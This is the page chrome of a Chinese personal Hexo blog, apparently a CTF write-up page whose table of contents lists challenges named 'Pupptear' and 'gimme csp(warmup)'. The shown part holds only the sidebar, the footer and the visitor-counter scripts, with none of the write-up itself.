          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Pupptear"><span class="nav-number">1.</span> <span class="nav-text">Pupptear:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#gimme-csp-warmup"><span class="nav-number">2.</span> <span class="nav-text">gimme csp(warmup):</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="chleynx"
      src="/images/ch.jpg">
  <p class="site-author-name" itemprop="name">chleynx</p>
  <div class="site-description" itemprop="description">不是看到希望才坚持，而是坚持了才能看到希望</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/chensonghi/chensonghi.github.io/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;chensonghi&#x2F;chensonghi.github.io&#x2F;" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/c582037" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;c582037" rel="noopener" target="_blank"><i class="codiepie fa-fw"></i>CSDN</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2023-10-8 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">chleynx</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.3' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
